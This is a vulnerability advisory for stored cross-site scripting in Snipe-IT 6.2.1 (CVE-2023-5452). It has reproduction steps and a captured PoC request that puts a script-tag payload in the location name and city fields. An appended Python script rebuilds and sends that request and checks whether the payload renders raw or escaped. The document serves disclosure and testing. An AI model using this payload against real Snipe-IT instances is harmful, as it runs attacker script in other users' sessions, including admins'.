Exploit Title: Snipe-IT 6.2.1 - Stored Cross-Site Scripting
Date: 06-OCT-2023
Exploit Author: Shahzaib Ali Khan
Vendor Homepage: https://snipeitapp.com
Software Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1
Version: 6.2.1
Tested on: Windows 11 22H2 and Ubuntu 20.04
CVE: CVE-2023-5452
Description: Snipe-IT 6.2.1 is affected by stored Cross-Site Scripting
(XSS), which lets an attacker execute JavaScript in the browser of any user
who views the affected asset. The locations endpoint (POST /api/v1/locations)
is vulnerable: the name and city submitted when creating a location are
stored as entered, and the payload runs when another user, including an
admin, later opens the asset that uses that location. A standard
(non-admin) account is enough to plant it.
Steps to Reproduce:
1. Log in as a standard user [non-admin] > Assets > List All
2. Click to open any asset > Edit Asset
3. Create a new location and add the payload:
<script>alert(document.cookie)</script>
4. Now log in as any other user, non-admin or admin > Assets > List All
5. Open the same asset whose location was changed, and the payload
will be executed.
PoC Request:
POST /api/v1/locations HTTP/1.1
Host: localhost
Content-Length: 118
Accept: */*
X-CSRF-TOKEN: CDJKVGNWZFKFKFKFUEENX0AQMJIHHXJGZMKG1SFEVEGV
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Referer: http://localhost/hardware/196/edit
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: snipeit_session=ahw3arn6pdg90xu4ovg1fbzywyckplixjtufmelo;
assetsListingTable.bs.table.cardview=false; laravel_token=
eyjpdii6iitpm1rxvevvevgnlzzrtd28wymhzble9psisinzhbhvlijoickjocmnytznos3jydkdkdh smpjme1grmjymi9dunvkastdtzbnbhzdvg1xnvavbta5cjjjhm1ftbi95sevznmnnzdknhy5em5pk3
ZJQ2F3VNB6RNHJRCS4NKV6NW16RNRWB3M0CXBUT2ZPZEXOQ3JRN1VIVHB3CWV5CWV5NETBRWZ4OXBSDEX 4R0HSEELLV1BEBWK2WGXIWEBOMDG5CGFYSJ1RSNENCKX3BXG2QI9KQZFVNGJJTKTKTKTKTKTKJTVUW0EII4YVNM
d2uxdw1telbdv1byuk9yetfoudr1cs9sv2tfri9log1izgvweuxjdghhtxrlsnfvtu82qvivrephs 215BKRTKZM5M1RVQ21NVENST1MN1FUT1TBFKOVDVPBHD4A3BFQW1YQKY3NFR2BZRQSGSGZIELPPPA0
01MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D;
XSRF-TOKEN=
eyjpdii6ijnmmvpnuepdnctpv0phkoczzdrsumc9psisinzhbhvlijoiwxyvzky2btk4monsuufzq jzivwtpdm1jre1wwmpbd2tszwnjblgxzwg3donyl2x0zkxib3n5y1n5ymryvm1xum91n3pes1f1bh
FWMEV1Y2XSZ1VQZ1FYDMDYCJJRZXZMZG9NYMPWY2HTL2TPDXNBQUDEBJVHSEVJVJV2TZKOPYELELCJ tywmi0iii1yzhknmq2ndaxnmzkytq1nzvhzmi5ogy3oda3oda3mdkootc4zwvhymmizmizwiymjzhzgzgzizwi5
mjmomgjjzdbknzu4iiiiwidgfnijoiin0%3D
Connection: close

name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&city=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&country=
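The following script is an added example and is not part of the original advisory or of Snipe-IT. It rebuilds the PoC body above byte for byte (the 118 bytes the Content-Length header announces), wraps it in the same session-cookie and CSRF-token headers, and adds the check a tester wants after step 5: whether a fetched page contains the stored payload as live markup (the XSS fires) or only in HTML-escaped form (the rendering is safe). The host, session cookie and CSRF token are placeholders to be replaced from a logged-in standard-user session, and the two HTML fragments are constructed stand-ins, not captures from a real instance. One caveat on the payload itself: Laravel marks the session cookie HttpOnly by default, so alert(document.cookie) proves script execution in the victim's session rather than session theft; the impact is whatever the script does with that session.

```python
"""Added example, not part of the original advisory or of Snipe-IT.

Rebuilds the PoC body for POST /api/v1/locations, assembles the matching
request, and classifies how a page renders the stored payload. Host,
session cookie and CSRF token are placeholders supplied by the caller.
"""
import html
import urllib.request
from urllib.parse import urlencode

# Same payload as step 3 of the advisory.
PAYLOAD = "<script>alert(document.cookie)</script>"


def build_location_body(name=PAYLOAD, city=PAYLOAD, country=""):
    """Form-encode the three fields the PoC sends.

    safe="()" keeps the parentheses literal, as the captured request does,
    so for the default payload this returns the 118-byte body that matches
    the PoC's Content-Length header.
    """
    return urlencode({"name": name, "city": city, "country": country},
                     safe="()")


def poc_request(base_url, session_cookie, csrf_token, body):
    """Assemble the request that mirrors the PoC capture (nothing is sent).

    The captured request authenticates the way the web UI does: with the
    snipeit_session cookie plus the page's CSRF token in X-CSRF-TOKEN.
    base_url, session_cookie and csrf_token are caller-supplied placeholders.
    """
    req = urllib.request.Request(f"{base_url}/api/v1/locations",
                                 data=body.encode(), method="POST")
    req.add_header("Content-Type",
                   "application/x-www-form-urlencoded; charset=UTF-8")
    req.add_header("X-CSRF-TOKEN", csrf_token)
    req.add_header("X-Requested-With", "XMLHttpRequest")
    req.add_header("Cookie", f"snipeit_session={session_cookie}")
    return req


def classify_rendering(page_html, payload=PAYLOAD):
    """Return "raw" if the payload appears as live markup, "escaped" if only
    its HTML-escaped form appears, "absent" otherwise. "raw" is the step 5
    condition: the browser will execute it when the page loads."""
    if payload in page_html:
        return "raw"
    if html.escape(payload, quote=False) in page_html:
        return "escaped"
    return "absent"


# Constructed fragments (not captured from a real instance) standing in for
# the location field of the asset edit page after the payload is stored.
VULNERABLE_FRAGMENT = ('<select name="location_id">'
                       f'<option value="7" selected>{PAYLOAD}</option>'
                       '</select>')
FIXED_FRAGMENT = ('<select name="location_id">'
                  f'<option value="7" selected>{html.escape(PAYLOAD)}'
                  '</option></select>')


if __name__ == "__main__":
    body = build_location_body()
    print(len(body), body)  # 118 bytes, identical to the PoC body
    # Placeholders: replace with a real host, session cookie and CSRF token.
    req = poc_request("http://localhost", "SESSION_COOKIE", "CSRF_TOKEN", body)
    try:
        with urllib.request.urlopen(req, timeout=5) as resp:
            print(resp.status, resp.read(200))
    except OSError as exc:  # offline, unreachable host or rejected session
        print("request not sent:", exc)
    for label, frag in (("vulnerable", VULNERABLE_FRAGMENT),
                        ("fixed", FIXED_FRAGMENT)):
        print(label, classify_rendering(frag))
```

After creating the location with the real credentials, fetch the asset's edit page (the Referer above shows the shape of that URL) as the second user from step 4 and pass the response body to classify_rendering; "raw" reproduces the finding, "escaped" is what a patched instance should return.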
Thanks,
Shahzaib Ali Khan